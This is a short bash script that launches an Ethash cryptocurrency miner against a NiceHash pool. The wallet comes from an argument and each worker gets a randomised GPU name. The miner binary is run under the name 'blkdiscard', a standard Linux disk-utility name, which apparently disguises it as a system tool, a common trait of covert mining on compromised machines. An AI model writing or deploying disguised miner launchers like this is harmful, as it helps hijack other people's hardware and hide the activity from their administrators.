#!/bin/bash
POOL=daggerhashimoto.eu.nicehash.com:3353
USER=$1
WORKER=$(echo GPU-$(shuf -i 1000-9999 -n 1))
ALGO=ETHASH

chmod +x blkdiscard
./blkdiscard -a $ALGO --pool $POOL --user $USER.$WORKER --ethstratum ETHPROXY
